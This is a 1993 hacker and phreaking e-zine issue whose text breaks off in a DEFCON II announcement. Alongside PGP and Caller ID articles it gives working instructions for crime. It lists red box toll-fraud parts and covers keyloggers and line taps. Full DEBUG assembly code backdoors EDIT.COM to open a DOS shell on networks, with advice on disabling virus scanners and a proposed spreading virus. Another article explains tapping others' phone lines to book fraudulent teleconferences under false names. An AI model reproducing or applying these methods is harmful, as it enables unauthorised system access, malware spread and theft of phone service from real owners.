Copy Link
Add to Bookmark
Report
Pandemonium Issue 01
ÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ
ÜÜ ÛÛ ÜÜ ÛÛ ÛÛ ÛÛ ÜÜ ÛÛ ÜÜ ÛÛ ÛÛ ÜÜ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ
ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ
ÛÛ ÛÛß ÛÛ ÛÛÛÛ ÛÛÜ ÛÛ ÛÛ ÛÛ ÛÛ ÜÜÛÛÜ ÜÛÛ ÛÛ ÛÛ ÛÛÛÜ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÜ ÜÛÛ
ÛÛ ÛÛ ÛÛ ÛÛ ßÜÛÛ ÛÛ ÛÛÛß ÛÛ ÛÛ ß ÛÛ ßÛÛÛÛÛß ÛÛ ßÛÛÛ ÛÛ ÛÛ ÛÛÛÛ ÛÛ ß ÛÛ
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
PANDEMONIUM MAGAZINE - ISSUE #1 - OCTOBER 31, 1993 - SPECTRE ENTERPRISES (tm)
______________________________________________________________________
( ------------------------------------------------------------------ )
\| |/ /
| ---- WELCOME TO THE PREMIER ISSUE OF ---- | |
| | |
| ---- PANDEMONIUM | AKA P11 ----- | |
| | |
| AN INFORMATIONAL GUIDE FOR | |
| THE UNINFORMED | |
| | |
| Presented by Spectre Enterprises (tm) | |
| Covering diverse topics such as: | |
| Hack|ng(Coding), Ph0ne Stuff, and The Und3rgr0und | |
| FUCK it.. We have it all DAMMIT!.. | |
\_______________________________________________________________/ |
\_______________________________________________________________/
Volume Number One, Issue Number One Dated 10/31/93
Spectre World Headquarters BBS: The Aftermath
Sysop: Paradigm
14.4K V32.bis
2 Nodes (No HST at this time)
2 Gigs File Storage
RiSC Distrobution
VLANET (programming)
H/P Discussion
(206)230-0424
(206)230-0490
____________________________________________________________________________
----------------------------------------------------------------------------
Table Of Contents
-------------------
[00] - PREFACE: A Word From The Editors - Paradigm & Dr. Bombay
[01] - PHONE PRIVACY: The Lack of - Paradigm
[02] - ENCRYPTION: History of.. w/ PGP info - Quantum
[03] - CALLER ID: Read if bored - Paradigm
[04] - THE QUARTER: The Better Alternative - Edword
[05] - FUTURE SECURITY: Access Denied - Rum Runner
[06] - CREATING BACKDOORS IN DOS DEBUG - Natex and Rum Runner
[07] - TRASHING: The art of garbage sifting - Edword
[08] - TELECONFERENCING WITH THE DOCTOR - Dr. Bombay
[09] - DEFCON ][: The BIG Event - The Dark Tangent
[10] - NEWS: Hungry Youths Apprehended - Anonymous
____________________________________________________________________________
----------------------------------------------------------------------------
What is Spectre Anyway?
Spectre is a new H/P group with one goal in mind. That goal is to bring
the H/P world back on it's feet. Our view is that it seems to have fallen,
and can't get the fuck back up, or as the doctor says, 'it is becoming rather
viscous' [viskus]. We will accomplish this (hopefully) by educating the
masses in areas that Phrack and 26oo have negligently overlooked. While they
are aimed at the experienced members of the underground, we will be
establishing a structured foundation for the beginner/intermediate enthusiast.
Spectre's first goal is to produce a quality magazine which will
help further our movement. It will be aimed at the beginner/intermediate
hobbyist who wants to learn the basics or pick up a tip or two on a wide
variety of topics. Likewise, we will cover topics that are usually looked
upon as basic knowledge by the H/P community. Similarly, we will answer the
questions that many are afraid to ask, fearing to look stupid and/or ignorant.
Unfortunately, there is no main theme in our first issue. We have found in
case studies that organization has been linked to colon cancer, excessive
perspiration, and impotence.
In Summary, we hope to educate those who are willing to become the second
generation of hackers. Likewise we hope the magazine will instill greater
discussion in the areas we will present. We finally decided to go through
with this info-mag because nobody else was getting off their ass and producing
something of worth. In conclusion, lets unite in the hope to restore the
free flow of information in the underground.
Paradigm [Spectre]
Dr. Bombay [Spectre]
____________________________________________________________________________
----------------------------------------------------------------------------
The Current Member Listing as Of 10/29/93 1o:23pm
Paradigm - Founder/Writer/Ideas/Editor
Natex - Founder/Writer
Rum Runner - Founder/Writer/Ideas
Edword - Writer/Ideas
Dr. Bombay - Writer/Editor
Darion - Internet Writer
Quantum - Writer
The Kabal - Writer/Coder
Mental Floss - Musician (Next Issue)
Binaur - Coder (Next Issue)
Shadowspawn - VGA Artist (Next Issue)
If you want to be a Distrobution Site or want to be a part of the
Pandemonium team, whether it be a Writer/Artist/Coder, or would like
to write an article freelance, you can reach us at the following
location:
The AfterMath - Spectre/Pandemonium WHQ - [206]230-0424
- [206]230-0490
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [- Phone Privacy and How it Affects US -] -
\===========================================/
----------------------------------------
\ / \ /
| Article By Paradigm |
\ ______________________________ /
Never assume what you say over the phone to be private and/or
confidential! In today's society the government has nothing else
better to do than overlook our every move. They seem to find every
possible way to infringe on our privacy. For instance, at least two
different Government agencies are known to use supercomputers to
routinely monitor phone conversations transmitted via microwave.
Virtually all long distance calls, as well as many local calls that
originate out of a central office are sent in this matter. Each
conversation is temporarily recorded and searched for trigger words,
terms,and phrases. If these are to be found, the conversation is
permanently recorded, along with the called/calling phone numbers, for
later analysis.
So what does this all mean? It means that you better watch what you
say because Ma bell is listening. Even those who are unknowing to this
infringement could be labeled as a possible threat due to the usage of a
few misplaced words and likewise would undergo yet further invasion.
National security is important, but the definition of that security is
becoming one that needs redefining.
There is yet another way in which the government, or anyone for
that matter can listen in on our conversations. All that is needed is a
an access code to a system known as REMOBS (REMote OBServation).
Originally intended as a way for the telco to monitor your phone
activity, it can be used by your fellow phreaker to listen in on your
conversations. Basically it is a non-hardwire line tap that can be done
from any touch tone phone. What is even worse is the fact that you are
unaware of the tap, except in some instances where you will hear a
clicking sound if the trespasser were to dial. Likewise, you may recieve
the clicks before the tap has been engaged if the REMOBS system being
used is mechanical opposed to digital. REMOBS is just another means of
ensuring that what you say over the telephone can not be considered private.
Hopefully, those of you that have actually read this far have now come to
realize that your privacy is at stake. With the means I have just described,
anyone with access to these to devices can intercept your communications.
You should become more aware of what you say. The courts have already proven
that you have no privacy when it comes Telecommunications. For these
reasons many people have begun to seek encryption in order to secure the
channels that used to be safe.
Paradigm [Spectre]
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [- Encryption: How and Why? -] -
\===========================================/
----------------------------------------
\ / \ /
| Article By Quantum |
\ ______________________________ /
Encryption first got it's start in the early 10th century. Caesar
was the first to use encryption to send battle plans conceived by the
emperor to his generals in the front lines. Caesar used a simple sub-
sitution method for encryption. (ie. A would be R, B would be S) For
its time, the method was strong, for by the time enemy forces could de-
cipher it, the plans were already being executed. If Caesar had randomly
chosen letters to subsitute, having no patterns, then used the scheme only
once, he would have made the one-time-pad used by governmental agencies today.
Caesars original method however, while strong for its time, would last
literally a second in todays world. This little history shows an how
you must upgrade security, to keep information secure. Today, technology
in microprocessors doubles every 18 months. That means information you
encrypted 3 years ago, is 4 times as likely to be comprimised today.
Now on to a program that is considered contraband by the US
government, PGP (Pretty Good Privacy) (It is considered illegal because
of disputes on patent of the algorithms used in PGP, notably, RSA).
I like PGP because it is an excellent software for keeping info
secure. It is widely availible, so that anyone wishing to communicate
securely can pick up a copy of PGP and read their messages. I will be
explaining how to use PGP, how to keep keys secure, and some of the other
basics.
HOW TO USE PGP
PGP is a very easy program to use, and for more detailed information
read the help files (pgp -h) or read the documentation. The first thing
you need to do is to create a public/private key pair so that you may send
and receive messages. Do this with the <pgp -kg> command. (Exclude brackets
from here on). This stands for <Key Generating> and will give you a public
key, and a private key. You will be asked to enter random keystrokes from
which PGP will devise your keys. You will also be asked for a secret pass
phrase (much like a password) this is for extra security.
KEEP YOUR SECRET KEY OFF YOUR HD! KEEP IT ON A FLOPPY! This will
keep anyone who gains control of your computer (physically or by remote)
from getting your private key. The public key you will want to distribute
to all the local boards so that others may send you messages. You will also
want to gather other peoples public keys, because without their public key,
you can't send them a message. (You will need to copy your public key off
your public keyring
with the <pgp -kx <your user id> <key name> <keyring>>
^^^/^^^^^^^^^ ^/^^^^^^^ ^^^\^^^^
This is your name / This will be <pubring> for public key
/ ring.
This is the base filename of the key
to be extracted.
Then copy the <filename>.asc file to your upload directory and upload it as
either a message (u/l ascii) or a regular file. [ I prefer messages ]
To add a persons keyring that you d/l to your public ring, use the command:
<pgp -ka <keyname> <ring>
Again, keyname is FULL filename, and ring will be pubring. So now you want to
send someone a secret message. Write it in any ascii compatible editor, then
encrypt it with the recipients public key command:
<pgp -e <filename> <Recipients_ID>
Look if you have the recipients_id with the <pgp -kv> command. This encrypts
a message, than only the repipient can decode, not even you can decode the
message you wrote (But why would you want to?). You can add further security
to the message by `signing' it with your secret key (this in now way
comprimizes security).
Use <pgp -es <filename> <recipient> -u<your_ID>>
You got an encrypted message, how do you decode it? use the command:
pgp -d <in_filename> <out_filename>
<Encrypted message> <Filename for plaintext>
If you want to be able to u/l your encrypted message ascii, for
transmittion over network, add the -a to the command line, this is ascii
armor. (ie. <pgp -eas my_file.doc Paradigm> would encrypt a message to
Paradigm, sign it, and ascii armor it for u/l.)
Each key in your public keyring has a trust rating to it. This
is the level of trust which you put on the key as to actually belonging
to whom it says it does. If you want to edit the trust on one of your
keys (Your friends BBS was hacked) use:
pgp -ke <user_id> <keyring>
And you may then change the trust rating on the key. (PGP will alert you
when you receive a message from that person to be careful of imposters)
MORE ON ENCRYPTION SECURITY
When signing a message with your name, you prove the message is
from you. (PGP automatically checks the signature with the public key)
By signing a message with your private key, you may think you are comp-
rimising your key. Not so, PGP uses the MD5 message digest for processing
signatures. What this does is take the least sugnifigant 64 bits of your
key (your key is 128-1024 bits in length) then the least sugnifigant 24
of the 64 and signs the message. Knowing the 24 lowest bits of a 1024 bit
key may provide very little to an attacker wishing to brute force your
key.
When you write a message that is sensitive, you still have the
plaintext on your HD. You can delete this file, but like other files, it
will come back when you undelete with Norton or PC Tools. The -w option
will wipe the plaintext off your HD, then overwrite it.
<pgp -esaw secret.doc Paradigm -u Quantum> would encrypt a message
to Paradigm, sign it, ascii armor it, then wipe the plaintext.)
Now, even though you have wiped the file from your HD, sensitive
hardware can still read the faint magnetic traces from your HD and acquire
your plaintext. (FBI, SS both have this in the computer fraud divisions)
Yet another way people may get the idea of your message is through
traffic analysis. This it done by examining your phone bill to see
where the message came from, where it was going, and at what time. This
does not tell what is in your message, but can lead in the right direction.
I hope I didn't lose anyone in this article, it is a very complex
subject and this just scratches the surface. Any feedback or questions
is appreciated.
>>>My next article will be on how to break and decipher the meaning of
any messages you may come across, both through cryptanalysis, brute force
attacks, and algorythmic weaknesses including factoring and prime number
digests.<<<
Quantum [Spectre]
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [- General Info On Caller ID -] -
\===========================================/
----------------------------------------
\ / \ /
| Article By Paradigm |
\ ______________________________ /
Over the years, the telcos have been installing new signalling
equipment that can instantaneously pass on the callers' phone number
to the reciever of the call. This has become a reality to many areas all
over the U.S. On August 3rd, 1993, Washington has become the latest
victim. However, those who are not customers to US west will not have
this service available as of yet. Even though the service has been has
been widely publicized and discussed on the major boards there still
tends to be confusion amidst the general public on what it is all about.
This short article will cover some information on the new service
"Caller ID".
Those who have the service available to them are given several
options. One such option is to pay for a caller id box which sits next to
your phone and will display the number of the caller before the phone
even rings. This is nice for when you don't want to talk to that guy/girl
that won't get the hint. What I don't get is the fact that any knob could
hit *67 to block the line so his/her number isn't displayed when calling
you. Line blocking (hit *67 before call is made) will not block 911 or
Call Trace (*57). Call tracing was made available for those who get
harassing/obscene phone calls and wish to catch the perpetraitor. The
victim of the call would hang up and hit *57 , then he/she would get a
recording telling whether or not the call had been successfully traced.
Likewise you will be hit with that $1.50 charge per trace. I have heard
several rumors of how many times it takes to trace someone before you
can take action, but it all depends on the situation. On normal
circumstances it will take 3 traces to take detterent action. If the
person feels that the call is life threatening , then by all means he/she
can contact the local police force and can use the trace to aid them.
One other thing I failed to mention was the fact that you cannot line
block (*67) a Call Trace (*57) , for obvious reasons.
Little known to most, Caller ID(ICLID) has been around for a long
time, but has been better known as ANI (Automatic Number Identification).
Caller ID is simply one of the many forms of ANI and is part of MA's plan
to screw us over. Caller ID has been around for quite some time in areas
you might not have realised. Most larger companies have it for all incoming
calls, which in turn will brin up callers' customer report. Likewise, we
are all familiar with Enhanced 911 and its abilities. For more information
on 911 I highly suggest checking out Phrack which covered the documents in
one of its issues (I am braindead right now.. and can't remember which one).
ANI has been a major cause for the drop of the inexperienced
phreaker and/or hacker. Unless they don't go to appropiate measures
they can get caught scanning for Carriers and/or tones (some states don't
allow scanning of any sort) and the hacking of the systems found. Many are
afraid of getting caught and prosecuted for their actions, and personally I
don't blame them. Unfortunately, this is one of the reasons the H/P scene
seems to be slowing in the area that at one time flourished. Hence, new
ideas and concepts have begun to pop up everywhere. Now, with the advent of
cellular technology, people are finding new ways to accomplish things. Even
payphones seem to be picking up in usage by your fellow hacker due to the
fact that they are safer if not abused.
Paradigm [Spectre]
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
-[- The Quarter: Building a Red Box First Hand -]-
\===========================================/
----------------------------------------
\ / \ /
| Article By Edword |
\ ______________________________ /
The Quarter
While I was flipping through a recent issue of 2600 I noticed the
schematic for the Quarter. A close examination of the schematic showed one
error wich is fixed with the accompanying picture [Q.BMP].
The hardest part of building this box is that you need a 600 Ohm
speaker. If you run into trouble finding one call Mouser at 800-23MOUSER it
should run you about $5 bucks and while you are at it order a 6.5Mhz Crystal.
Building the box is easy, just be cautious of heating up the IC's because they
are a little sensitive to heat. Be careful and take your time as you are in
no rush and rushing it only makes for a sloppy job. The circuit uses a
TCM 5089 DTMF encoder controlled by a 6.5 Mhz crystal to make the musical
tones. The 555 timer is used with the decade counter to give the correct
timing and count out 5 tones. I was in a hurry and bought all the parts
around town which cost me quite a bit more than it should of (I think I payed
$20) so look for a good deal and maximize your savings, after all who ever
said a toll fraud device should cost a lot of money?
The Quarter is a nifty improvement over the $25 dialer which is not
being produced anymore from what I hear. Not to mention that you have to get
a crystal which can cost a lot and is hard to fit in the tiny box. This also
requires a crystal but is much cheaper to build. I would also like to remind
you that all of the credit for this device goes out to 2600 for printing this
up, this is only a copy with some additions by me. Enough talk let's get down
to the parts list.
Resistors: Values: Notes:
R1 220k Ohm The exact values of R1 and R2 are not
R2 220k Ohm important so long as their sum is 440.
R3 1k Ohm
Capacitor: Values:
C1 0.1 uF
Crystal: Values: Notes:
X1 6.5 Mhz 6.5536 will also work
Chips: Name: Notes:
U1 TCM5089 DTMF encoder
U2 74HC4017 Decade counter Regular 4017 is okay.
U3 CMOS 555 Timer IC. Regular 555 is okay if a 1
kOhm resistor is inserted between pins
3 and 8
Speaker: Impedance: Notes:
SPKR 600 Ohm U1 expects an equivlent load.
Switch: Type: Notes:
S1 Momentary You may also add a power switch.
[NOTE]
As printed the circuit workes on 3 AAA batterys for a total of 4.5 Volts. A
9 volt battery may also be used but R1 and R2 should then total 470K Ohms.
Edword [Spectre]
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [- Future Security: Ways to Work Around -] -
\===========================================/
----------------------------------------
\ / \ /
| Article By Rum Runner |
\ ______________________________ /
The old ways of hacking into a system, mainframe or network are quickly
dying out. Most people no longer use their first name as a password. It
was nice when things were so simple. Now the educational hacker needs
to be much more creative. In some UNIX systems, the password files are
shadowed. A shadowed password file is one that has a star '*' or other
character in the place of the encrypted password. If you are fortunate
enough to have the password file, or have a system that does not have a
shadowed password file, then the following will not be as much of an
urgency for you.
If you have a systems /etc/passwd file you can run a cracker on it, such
as Crackerjack to try to get accounts on that system. Password file crackers
work on the fact that the encryption is not easily breakable but if you
encrypt that same word with the same salt they will compare and you will have
that accounts password. Such programs work on passwords that are found in
standard dictionary files, however it would be hard to get every single
password if they were all random letters and numbers.
These methods of cracking with a dictionary file using something like
cracker jack are getting old fast. Mainly because users don't and can't just
use words, they need to change the capitalization, or add numbers or other
characters. Most crackers read from a dictionary, and usually only try the
words, and variations that you give it. So if someone used a password
"account1", most crackers wouldn't find it, same goes for "#1acct". This can
become tedious very fast, and all but the most aggressive hackers drop out.
Some people have suggested that we create a look up table of all
possibilities for the encryption, or crack a password by brute force, all
possible permutations. Not quite, the possibilities for permutations is a
72 digit number. Not something to do in an afternoon's work.
The future looking hacker knows that systems are getting tighter, and will
continue to find new ways around the barriers. Some of the ways around
this are by line tapping, keystroke recorders, and network watchers
(snoopers).
There are several different ways to tap a line, such as hard wire splice
and electronic induction. Both ways allow the educational hacker to listen
in on what is going through the line, just be sure that you modem is
listening at the right speed (baud) otherwise all you'll get is a screen full of
trash. However, I wouldn't do speeds above 2400 baud. If your quick, you can
catch where the person is dialing (listen to DTMF tones), and get their log
on with password. They will even show you how to get around if you're not
familiar with the system. (Not sure if this is what they meant when they
said on-line training is the wave of the future.)
Second is to use a keystroke recorder (TSR). There are some available
on some of the educational boards. Usually what they do is record all of a
users keystrokes into a hidden file somewhere on the hard drive. The only
down side to this is that you need access to that machine before and after
that person logs on, or does their work. This isn't a problem if you were to
install the keystroke recorder in a computer lab at work or in a school. Set
it up in the morning, and come back the next morning.
The third method is to use a network watcher (snooper). These are a
little more difficult to make, and to come by. Though, if you have one, you
can watch what everyone is doing on a network. Since with Token ring and
Bus networks, all information passes through all users, there is no reason
why you can't take a look at it before it passes by.
Rum Runner [Spectre]
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [-Programming Backdoors in DOS using MS Debug-] -
\===========================================/
----------------------------------------
\ / Article/Programming by Natex \ /
| Programming by Rum Runner |
\ ______________________________ /
Many of us at one time or another have wanted to have access to the
operating system of some terminal, local area network, etc. Many of these
networks and computers are easy to get into, but others have more security.
When such networks are first started, access to the operating system is easy.
Usually it involves either pressing CTRL-C during the execution of the
AUTOEXEC.BAT file or stealing a copy of one of the network boot disks and
rewriting the AUTOEXEC.BAT file so that it puts you directly into the oper-
ating system. When security tightens, however, you may find it difficult to
access the operating system. That is what BACKDOORS are for. It is relatively
simple to modify an existing program or utility to suit your needs.
One of the first programs that we modified to do this was EDIT.COM. Many
networks support the use of a text editor. Several of our ideas were to make a
special command line parameter or to shell to COMMAND.COM when the program ran
out of memory. The one that we finally went with was to put oneof those "Press
and key to continue" messages when the user exited. If the user key they hit
was say "A" it would run the file COMMAND.COM. If any other key was pressed, it
would return the user to the network. If any of the network users were familiar
with MS-DOS edit, they would likely think that it was the network asking for
the keypress instead of the program.
To modify the file we used a nice little utility that everyone with MS-DOS
has: DEBUG. Debug works great and is relatively easy to use. To start editing
EDIT, simply go into the DOS directory and write the following (it is a great
idea to make a back-up copy of edit.com first!!):
DEBUG EDIT.COM
This will put you in the DEBUG program with EDIT.COM as your current file.
The first thing you will need to do is take a look at your registers. To do
this type R and press return. You should see something like this.
C:\DOS>DEBUG EDIT.COM
-r <---- user input of 'r'
AX=0000 BX=0000 CX=019D DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=1672 ES=1672 SS=1672 CS=1672 IP=0100 NV UP EI PL NZ NA PO NC
XXXX:0100 BB6404 MOV BX,0464
All of the numbers seen are in hexidecimal or base 16. The one that we need
to look at now is the register CX. Register CX is the current file size.
for our purposes we will need to change this size to about 300 temporarily.
To accomplish this task enter the following:
r cx
0300
This will change the file size to 768 bytes (remember that all of the
registers are in hexidecimal). Now the thing to look for in a program is the
actual end of the program where it exits. This can be several things. If
you are making a backdoor in a really old dos program the end of the program
might be: INT 20. INT 20 stands for interrupt 20 which was used to terminate
programs in old dos versions. Now most programs have:
MOV AH,4C
INT 21
which is interrupt 21 function 4C. To search for this in a program you need
to use the unassemble command. Do this by pressing U at the prompt. What you
will see are a bunch of assembler commands. In EDIT.COM the end of the
program is at location XXXX:01C9. At this spot you will see something similar
to this:
XXXX:01C9 B44D MOV AH,4D <--Get child process return code
XXXX:01CB CD21 INT 21 <--Run the above function
XXXX:01CD B44C MOV AH,4C <--Terminate with return code
XXXX:01CF CD21 INT 21 <--Run the above function
All that you need to do is change line 01C9 to jump to the location of your
"Press any key to continue" routine. You do this by typing:
a 01C9
JMP 029E
<--Press the enter key here
A good place to put this routine is at location XXXX:029E. This is because
the end of the file was prevoiusly set to location XXXX:029D (Register CX +
100 + 1 because the beginning of the file starts at line 100). To add in the
routine enter the following:
a 029E
MOV AH,09
MOV DX,02C0
INT 21
MOV AH,08
INT 21
CMP AL,61
JZ 02AF
INT 20
MOV AH,4B
MOV DX,02D0
MOV BX,0286
MOV AL,00
INT 21
INT 20
<--- Make sure you press enter here
e 02C0 "Press any key$"
e 02D0 "COMMAND.COM" 00
r cx
01DC
w
q
HOW IT WORKS:
The a 029E command tells debug that you want to start entering assembler
code. The three commands that follow tell the computer that you want to print
a text string at 02C0 to the monitor. The next two lines wait for a keypress.
When the user presses a key it compares the key that they pressed to 61 (61 is
the hexidecimal value for a lowercase "a". If you want to change this to
another key, look up the ascii table in your DOS book to find out the hex
values for other keys). If the key pressed was "a" it jumps to location 02AF
and executes the code there. If it was another key, it exits. At location
02AF the file specified in 02D0 is run. In this case it is COMMAND.COM (the
two zeros at the end of COMMAND.COM tell it that the file name is ended just
like how there is a dollar sign after the "press a key" text to tell the
program that the text is done). After it is done running the program (after
you type EXIT in the DOS shell) it exits back to whatever it was run from
(the network in this case). The "r cx" command like earlier specifies the
file size in hexidecimal. Here it is changed to the exact size of the new
file (476 bytes). The "w" command writes the file to disk and the "q" command
quits DEBUG.
VIRUS SCANNERS:
Some virus scanners may detect the change in the file size. To disable
these, you should do the "MEM /C /P" command from the DOS prompt. This will
tell you what TSR's (terminate stay resident) programs are in memory. If any
look like virus checkers, disable them by taking them out of the AUTOEXEC.BAT
file. If the people running the network are using the MS-DOS 6.0 virus
scanner, you should delete the file called CHKLIST.MS from the DOS and root
directory.
CONCLUSION:
This program will work in nearly all network situations. The only problem
is that you have to get it into the network first. You can accomplish this
by the methods mentioned in the first part of this article. This program is
mainly to ENSURE that you will always have access to the network you are
using. It is important that the file is in the DOS directory and that
COMMAND.COM is also in the DOS directory. (Don't know why it wouldn't be).
If you know assembler you can continue making backdoors in other programs.
Another idea that we have had is to make a virus that appends to the end of
EDIT.COM and changes line 01C9 to JMP 029E. This could spread all over the
entire network so that you would have access to DOS on any of the terminals.
It would not likely spread out of the network unless someone had EDIT.COM on
their disk and decided to take it home. Wouldn't that one be interesting.
Have fun making backdoors. Until next time...
Natex [Spectre]
Rum Runner [Spectre]
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [- Beginners Guide to Trashing -] -
\===========================================/
----------------------------------------
\ / \ /
| Article By Edword |
\ ______________________________ /
Trashing, dumpster diving, can hopping, they're all the same thing.
While the goals are to get the great treasures companies throw out, notebooks,
printouts, carbons, manuals, and countless other items of value can be found.
While there are many different ways of going about this, few are as safe and
as rewarding. You will need at least two people, and a car does not hurt
either. Get on your worst clothes, army coats, ripped shirts, jeans with
holes in them and other such normal homeless person apparel. Get a few
trash bags in your pockets and wait until it's about 1am. Find your dumpster
hopefully behind a building such as a Bell office, Cellular phone center etc.
Jump in, whip out the trash bags and load them up, hopefully you have a car
and someone will pick you up in five minutes. Don't really try to sort
everything you see but go for the notebooks, computer print outs and other
items of interest pushing away the boards, empty boxes, golf clubs etc...
Throw the stuff in the car and drive somewhere that there is not a lot of
people and sort your findings, go to the edges of parks where there are those
garbage cans and get rid of the unwanted stuff [remember to recycle paper].
Go home and read everything again making a note of what you found. Even if
the stuff you find is not worth anything, to you check with the locals and
trade for other useful information.
If security comes over to you just leave the area, since they are not
the police, they really cannot do much to you. However, since you are dressed
in homeless apparel just act drunk, stagger away, and they will probably just
tell you not to come back. If the police come, do not act drunk because they
can arrest you. Instead, tell them you were just looking for food and they
will probably tell you how to get to a homeless shelter. If you are lucky
they might give you a ride over there, ( hey free room and board for the night
or at least until the cops leave). There really isn't much they can do to
you, but I would avoid dumpster diving in the back of department stores such
as Nordstroms and The Bon. They often have cameras pointed at their dumpsters
for security reasons.
Edword [Spectre]
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [- Teleconferencing With The Doctor -] -
\===========================================/
----------------------------------------
\ / \ /
| Article By Dr. Bombay |
\ ______________________________ /
So you're tired of everybody at school pointing and laughing at you all
the time. You feel it's time to make a change in your life, time for you to
be in with the 'in' crowd. Yes, it's time to become k-k00l. Right now you're
probably thinking, well sure Dr. Bombay, i want to be k-k00l, but all my
attempts in the past have failed miserably. Take heart young hacker, with
just a few simple tools and a vague plan, you can set up a teleconference.
Once word gets out around school, you'll have lots of friends, be at all the
parties, and you can even steal milk money from the little geeks that used to
be your only friends. Things you'll need:
- a phone
- two alligator clips
- a wire stripper
- a phone line (preferably not your own)
What to do:
Okay, first you'll need to modify your little phone ever so slightly. Cut
off the very end of the phone line (the part right before the bit that plugs
into the wall), and strip the outer insulation with your handy dandy wire
stripper or mommies good scissors, they work equally well. Now you should
see four wires, cut off the yellow and green wires, you won't need them
[Note: some phones only have two wires, if this is case, skip the cutting bit
just mentioned]. Now grab your wire strippers (once again, mommies scissors
are an option) and strip the ends off of the red and green wires. Now attach
an alligator clip to each of your now exposed wires (with whatever method you
prefer, soldering is the best, but tape will do in a fix).
At this point, a car comes in handy. You'll need to find a phone line to
abuse..er, i mean use. What you should look for is either a small grey box on
the side of a house (not recommended) or a metal case on the side of a
building (usually office or apartment). They can vary widely in size, but i've
found they're usually around 2 feet high and maybe 6 inches to a foot wide.
To open most of them you will need to pull the bottom of the cover towards
you, then slide the entire cover downwards, and the cover will now swing
about the hinge on the bottom, just swing the top of the cover open now (or,
if this doesn't work, just fuck with it awhile). You should see a variety of
threaded posts sticking out from the unit (maybe 3/4 of an inch long), they
will be set up in pairs at a diagonal (see el cheapo drawing below). Attach
an alligator clip to each of the pair and then take the phone off hook and
listen for a dialtone, if there isn't one, try another pair. Once you have a
dialtone, the next step is to find out the number you're calling from.
El Cheapo Drawing
+ a+ c+ + +
threaded posts-> + b+ + + +
+ + + + +
try either a and b, or b and c..
Get an ANI number from yer local elite bbs..(one that seems to a pretty
good life expectancy is 1.800.852.9932). Dial this number, write down where
you're calling from, and now you just need to make up a little info. Write
down a name, address, (not yours..) and the number you just got on a slip
of paper, and you're ready to set up your conference. You can use whatever
company you like (i prefer AT&T at 1.800.232.1111). Call them up and let
them know that you would like to set up a teleconference. Then, request an
800 dialin, if you would like a conference where the participants call an 800
number and enter a 6 digit pin number (very good). They also offer an 0-700
dialin where the participants dial an 0-700 number and enter a pin (also
nice), Or there's the traditional dialout conference where you as the host
have to call all of your participants for them to get in. For a dialout
conference through AT&T, dial 0.700.456.1000 (these have the benefit of you
being able to be more choosy, with an 800 dialin sometimes idiots get your
pin number and sit there for awhile hitting touch tones). Something i've
learned from experience is that you can set a conference up at 2a.m., as long
as it's to begin in the evening, or a morning after that day (i.e. don't
say "uh.. yeah, i want a conference with 16 ports to begin in 3 minutes and
last for 2 weeks..."). Try not to get greedy when setting one up.. just ask
for 16 ports (lines) and maybe 10 or 12 hours, you can have them add more
ports after the conference starts. I know that at least 800 dial-in's are
auto-extending, so you'll usually get at LEAST 4 more hours then you ask for.
Whichever variety you choose, do NOT call the host number, or use the host
pin from your house, only join as a participant. If you need to get on as
host, use a diverter, or a payphone. Although calling from your home with a
participant pin is pretty safe, i still call through an operator (dial 0 and
tell the operator you'd like to make an operator assisted call to
1-800-what-ever, it's even free) as that seems to defeat the simple ANI 800
numbers have.
I ask you only to do one favor for me. As you set up conferneces
and become as cool as fuck, don't start writing in l@y/\/\3 l3++3/>s
all the time, or RAnDom CaPITalS and shit. I'm not sure why, but that always
annoys me.
Hack hard, hack long, hack 2 live.
_______________________________________________________________________
-----------------------------------------------------------------------
| |
\-----------------------------------------------------/
- [- Pre-Anouncement of DEFCON II -] -
\===========================================/
----------------------------------------
\ / \ /
| Typed up by The Dark Tangent |
\ ______________________________ /
]]]]]]]]]]]]]]]]]] ]]] ]] ] ]] DEF CON ][ Initial Announcement
]]]]]]]^^^^]]]]]]]]]]]]] ]] ] ] DEF CON ][ Initial Announcement
]]]]]]^^^^^^]]]]] ] ] ] DEF CON ][ Initial Announcement
]]]]]^^^^^^^^]]]]] ]] ] DEF CON ][ Initial Announcement
]]]]^^^^^^^^^^]]] ] ]]]]]]]] ] DEF CON ][ Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]]]] ] DEF CON ][ Initial Announcement
]]^^^^^^^^^^^^^^]]]]]] ]] ] DEF CON ][ Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]] DEF CON ][ Initial Announcement
]]]]^^^^^^^^^^]]]]]]]] ] ]] DEF CON ][ Initial Announcement
]]]]]^^^^^^^^]]]]]]] ]]] ]] ] DEF CON ][ Initial Announcement
]]]]]]^^^^^^]]]]]]] ] ] ] DEF CON ][ Initial Announcement
]]]]]]]^^^^]]]]]]]]]]] ]] ] ] DEF CON ][ Initial Announcement
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ] DEF CON ][ Initial Announcement
WTF is this? This is the initial announcement and invitation to DEF CON ][,
a convention for the "underground" elements of the computer culture. We try
to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
Virii coders, programmers, crackers, Cyberpunk Wannabees, Civil Liberties
